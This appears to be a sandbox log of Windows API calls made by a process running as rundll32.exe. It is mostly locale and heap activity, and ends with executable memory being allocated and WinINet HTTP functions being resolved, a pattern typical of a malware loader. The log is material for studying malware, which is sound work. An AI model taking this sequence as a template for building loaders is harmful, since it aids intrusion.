CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="June", cchWideChar=-1, lpMultiByteStr=0x14e8a8, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="June", lpUsedDefaultChar=0x0) returned 5 [0166.986] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x5) returned 0x637e48 [0166.986] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3e, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 5 [0166.986] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3e, lpLCData=0x14e808, cchData=5 | out: lpLCData="July") returned 5 [0166.986] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="July", cchWideChar=-1, lpMultiByteStr=0x14e894, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="July", lpUsedDefaultChar=0x0) returned 5 [0166.986] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x5) returned 0x637e58 [0166.986] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3f, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 7 [0166.986] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3f, lpLCData=0x14e7f8, cchData=7 | out: lpLCData="August") returned 7 [0166.987] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="August", cchWideChar=-1, lpMultiByteStr=0x14e880, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="August", lpUsedDefaultChar=0x0) returned 7 [0166.987] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x7) returned 0x637e68 [0166.987] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x40, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 10 [0166.987] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x40, lpLCData=0x14e7d8, cchData=10 | out: lpLCData="September") returned 10 [0166.987] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="September", cchWideChar=-1, lpMultiByteStr=0x14e86c, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="September", lpUsedDefaultChar=0x0) returned 10 [0166.987] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xa) returned 0x643198 [0166.987] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x41, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 8 [0166.987] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x41, lpLCData=0x14e818, cchData=8 | out: lpLCData="October") returned 8 [0166.987] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="October", cchWideChar=-1, lpMultiByteStr=0x14e8a8, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="October", lpUsedDefaultChar=0x0) returned 8 [0166.987] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637e78 [0166.987] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x42, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 9 [0166.987] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x42, lpLCData=0x14e808, cchData=9 | out: lpLCData="November") returned 9 [0166.987] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="November", cchWideChar=-1, lpMultiByteStr=0x14e894, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="November", lpUsedDefaultChar=0x0) returned 9 [0166.987] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x9) returned 0x6431b0 [0166.987] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x43, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 9 [0166.987] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x43, lpLCData=0x14e7e8, cchData=9 | out: lpLCData="December") returned 9 [0166.987] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="December", cchWideChar=-1, lpMultiByteStr=0x14e880, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="December", lpUsedDefaultChar=0x0) returned 9 [0166.987] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x9) returned 0x6431c8 [0166.987] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x28, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 3 [0166.987] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x28, lpLCData=0x14e7e8, cchData=3 | out: lpLCData="AM") returned 3 [0166.987] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="AM", cchWideChar=-1, lpMultiByteStr=0x14e86c, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AM", lpUsedDefaultChar=0x0) returned 3 [0166.987] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3) returned 0x637e88 [0166.987] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x29, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 3 [0166.987] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x29, lpLCData=0x14e828, cchData=3 | out: lpLCData="PM") returned 3 [0166.987] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="PM", cchWideChar=-1, lpMultiByteStr=0x14e8a8, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PM", lpUsedDefaultChar=0x0) returned 3 [0166.987] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3) returned 0x637e98 [0166.987] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x1f, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 9 [0166.987] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x1f, lpLCData=0x14e808, cchData=9 | out: lpLCData="M/d/yyyy") returned 9 [0166.987] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="M/d/yyyy", cchWideChar=-1, lpMultiByteStr=0x14e894, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="M/d/yyyy", lpUsedDefaultChar=0x0) returned 9 [0166.987] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x9) returned 0x6431e0 [0166.987] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x20, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 20 [0166.987] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x20, lpLCData=0x14e7d8, cchData=20 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0166.988] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="dddd, MMMM dd, yyyy", cchWideChar=-1, lpMultiByteStr=0x14e880, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dddd, MMMM dd, yyyy", lpUsedDefaultChar=0x0) returned 20 [0166.988] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x14) returned 0x625e48 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x1003, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 11 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x1003, lpLCData=0x14e7d8, cchData=11 | out: lpLCData="h:mm:ss tt") returned 11 [0166.988] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="h:mm:ss tt", cchWideChar=-1, lpMultiByteStr=0x14e86c, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="h:mm:ss tt", lpUsedDefaultChar=0x0) returned 11 [0166.988] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb) returned 0x6431f8 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x20001009, lpLCData=0x14e8a4, cchData=2 | out: lpLCData="\x01") returned 2 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x31, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.988] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637ea8 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x31, lpLCData=0x637ea8, cchData=4 | out: lpLCData="Mon") returned 4 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x32, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.988] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637eb8 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x32, lpLCData=0x637eb8, cchData=4 | out: lpLCData="Tue") returned 4 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x33, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.988] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637ec8 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x33, lpLCData=0x637ec8, cchData=4 | out: lpLCData="Wed") returned 4 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x34, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.988] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637ed8 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x34, lpLCData=0x637ed8, cchData=4 | out: lpLCData="Thu") returned 4 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x35, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.988] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637ee8 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x35, lpLCData=0x637ee8, cchData=4 | out: lpLCData="Fri") returned 4 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x36, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.988] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637ef8 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x36, lpLCData=0x637ef8, cchData=4 | out: lpLCData="Sat") returned 4 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x37, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.988] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637f08 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x37, lpLCData=0x637f08, cchData=4 | out: lpLCData="Sun") returned 4 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2a, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 7 [0166.988] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xe) returned 0x643210 [0166.988] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2a, lpLCData=0x643210, cchData=7 | out: lpLCData="Monday") returned 7 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2b, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 8 [0166.989] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x10) returned 0x643228 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2b, lpLCData=0x643228, cchData=8 | out: lpLCData="Tuesday") returned 8 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2c, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 10 [0166.989] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x14) returned 0x625e68 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2c, lpLCData=0x625e68, cchData=10 | out: lpLCData="Wednesday") returned 10 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2d, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 9 [0166.989] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x625e88 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2d, lpLCData=0x625e88, cchData=9 | out: lpLCData="Thursday") returned 9 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2e, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 7 [0166.989] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xe) returned 0x643240 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2e, lpLCData=0x643240, cchData=7 | out: lpLCData="Friday") returned 7 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2f, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 9 [0166.989] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x625ea8 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x2f, lpLCData=0x625ea8, cchData=9 | out: lpLCData="Saturday") returned 9 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x30, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 7 [0166.989] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xe) returned 0x643258 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x30, lpLCData=0x643258, cchData=7 | out: lpLCData="Sunday") returned 7 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x44, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.989] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637f18 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x44, lpLCData=0x637f18, cchData=4 | out: lpLCData="Jan") returned 4 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x45, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.989] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637f28 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x45, lpLCData=0x637f28, cchData=4 | out: lpLCData="Feb") returned 4 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x46, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.989] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637f38 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x46, lpLCData=0x637f38, cchData=4 | out: lpLCData="Mar") returned 4 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x47, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.989] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637f48 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x47, lpLCData=0x637f48, cchData=4 | out: lpLCData="Apr") returned 4 [0166.989] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x48, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.990] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637f58 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x48, lpLCData=0x637f58, cchData=4 | out: lpLCData="May") returned 4 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x49, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.990] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637f68 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x49, lpLCData=0x637f68, cchData=4 | out: lpLCData="Jun") returned 4 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4a, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.990] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637f78 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4a, lpLCData=0x637f78, cchData=4 | out: lpLCData="Jul") returned 4 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4b, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.990] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637f88 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4b, lpLCData=0x637f88, cchData=4 | out: lpLCData="Aug") returned 4 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4c, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.990] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637f98 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4c, lpLCData=0x637f98, cchData=4 | out: lpLCData="Sep") returned 4 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4d, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.990] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637fa8 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4d, lpLCData=0x637fa8, cchData=4 | out: lpLCData="Oct") returned 4 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4e, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.990] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637fb8 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4e, lpLCData=0x637fb8, cchData=4 | out: lpLCData="Nov") returned 4 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4f, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.990] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637fc8 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x4f, lpLCData=0x637fc8, cchData=4 | out: lpLCData="Dec") returned 4 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x38, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 8 [0166.990] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x10) returned 0x643270 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x38, lpLCData=0x643270, cchData=8 | out: lpLCData="January") returned 8 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x39, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 9 [0166.990] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x625ec8 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x39, lpLCData=0x625ec8, cchData=9 | out: lpLCData="February") returned 9 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3a, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 6 [0166.990] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xc) returned 0x643288 [0166.990] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3a, lpLCData=0x643288, cchData=6 | out: lpLCData="March") returned 6 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3b, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 6 [0166.991] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xc) returned 0x6432a0 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3b, lpLCData=0x6432a0, cchData=6 | out: lpLCData="April") returned 6 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3c, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 4 [0166.991] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x8) returned 0x637fd8 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3c, lpLCData=0x637fd8, cchData=4 | out: lpLCData="May") returned 4 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3d, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 5 [0166.991] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xa) returned 0x6432b8 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3d, lpLCData=0x6432b8, cchData=5 | out: lpLCData="June") returned 5 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3e, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 5 [0166.991] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xa) returned 0x6432d0 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3e, lpLCData=0x6432d0, cchData=5 | out: lpLCData="July") returned 5 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3f, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 7 [0166.991] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xe) returned 0x6432e8 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x3f, lpLCData=0x6432e8, cchData=7 | out: lpLCData="August") returned 7 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x40, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 10 [0166.991] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x14) returned 0x625ee8 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x40, lpLCData=0x625ee8, cchData=10 | out: lpLCData="September") returned 10 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x41, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 8 [0166.991] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x10) returned 0x643300 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x41, lpLCData=0x643300, cchData=8 | out: lpLCData="October") returned 8 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x42, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 9 [0166.991] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x625f08 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x42, lpLCData=0x625f08, cchData=9 | out: lpLCData="November") returned 9 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x43, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 9 [0166.991] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x625f28 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x43, lpLCData=0x625f28, cchData=9 | out: lpLCData="December") returned 9 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x28, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 3 [0166.991] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x6) returned 0x637fe8 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x28, lpLCData=0x637fe8, cchData=3 | out: lpLCData="AM") returned 3 [0166.991] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x29, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 3 [0166.992] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x6) returned 0x637ff8 [0166.992] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x29, lpLCData=0x637ff8, cchData=3 | out: lpLCData="PM") returned 3 [0166.992] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x1f, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 9 [0166.992] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x12) returned 0x625f48 [0166.992] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x1f, lpLCData=0x625f48, cchData=9 | out: lpLCData="M/d/yyyy") returned 9 [0166.992] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x20, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 20 [0166.992] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x28) returned 0x652278 [0166.992] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x20, lpLCData=0x652278, cchData=20 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0166.992] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x1003, lpLCData=0x0, cchData=0 | out: lpLCData=0x0) returned 11 [0166.992] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x16) returned 0x625f68 [0166.992] GetLocaleInfoEx (in: lpLocaleName="en-US", LCType=0x1003, lpLCData=0x625f68, cchData=11 | out: lpLCData="h:mm:ss tt") returned 11 [0166.992] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6a6) returned 0x6722d0 [0166.992] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6722d0 | out: hHeap=0x5d0000) returned 1 [0166.992] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x66eda8 | out: hHeap=0x5d0000) returned 1 [0166.992] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x650ba8 | out: hHeap=0x5d0000) returned 1 [0166.992] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x66ed78 | out: hHeap=0x5d0000) returned 1 [0166.992] GetLastError () returned 0x0 [0166.992] SetConsoleOutputCP (wCodePageID=0x4e3) returned 0 [0166.993] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x64f87b58, nSize=0x8c0 | out: lpFilename="C:\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe")) returned 0x20 [0166.993] SetConsoleCP (wCodePageID=0x0) returned 0 [0166.993] GetSystemDirectoryA (in: lpBuffer=0x14ef50, uSize=0x8c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0166.993] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x30) returned 0x632e60 [0166.993] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x47) returned 0x650160 [0166.993] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x632e60 | out: hHeap=0x5d0000) returned 1 [0166.993] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8c0) returned 0x659bf8 [0166.993] GetEnvironmentVariableA (in: lpName="dist", lpBuffer=0x14eecc, nSize=0x8c0 | out: lpBuffer="") returned 0x0 [0195.609] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x64f87b58, nSize=0x8c0 | out: lpFilename="C:\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe")) returned 0x20 [0195.610] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x64f88e00, dwSize=0x311d, flNewProtect=0x40, lpflOldProtect=0x14ee80 | out: lpflOldProtect=0x14ee80*=0x4) returned 1 [0195.613] GetWindowsDirectoryA (in: lpBuffer=0x64f87b58, uSize=0x8c0 | out: lpBuffer="C:\\Windows") returned 0xa [0195.619] VirtualAlloc (lpAddress=0x0, dwSize=0xd74, flAllocationType=0x3000, flProtect=0x40) returned 0x190000 [0195.622] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x40) returned 0x1a0000 [0195.622] VirtualAlloc (lpAddress=0x0, dwSize=0x12bb3, flAllocationType=0x3000, flProtect=0x40) returned 0x1b0000 [0195.624] VirtualFree (lpAddress=0x1a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.626] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x649fd8 | out: hHeap=0x5d0000) returned 1 [0195.626] VirtualProtect (in: lpAddress=0x64f40000, dwSize=0xa000, flNewProtect=0x4, lpflOldProtect=0x19058d | out: lpflOldProtect=0x19058d*=0x2) returned 1 [0195.672] LoadLibraryExA (lpLibFileName="WININET.dll", hFile=0x0, dwFlags=0x0) returned 0x77670000 [0195.693] GetProcAddress (hModule=0x77670000, lpProcName="InternetOpenA") returned 0x7769f18e [0195.693] GetProcAddress (hModule=0x77670000, lpProcName="HttpSendRequestA") returned 0x777018f8 [0195.693] GetProcAddress (hModule=0x77670000, lpProcName="InternetCloseHandle") returned 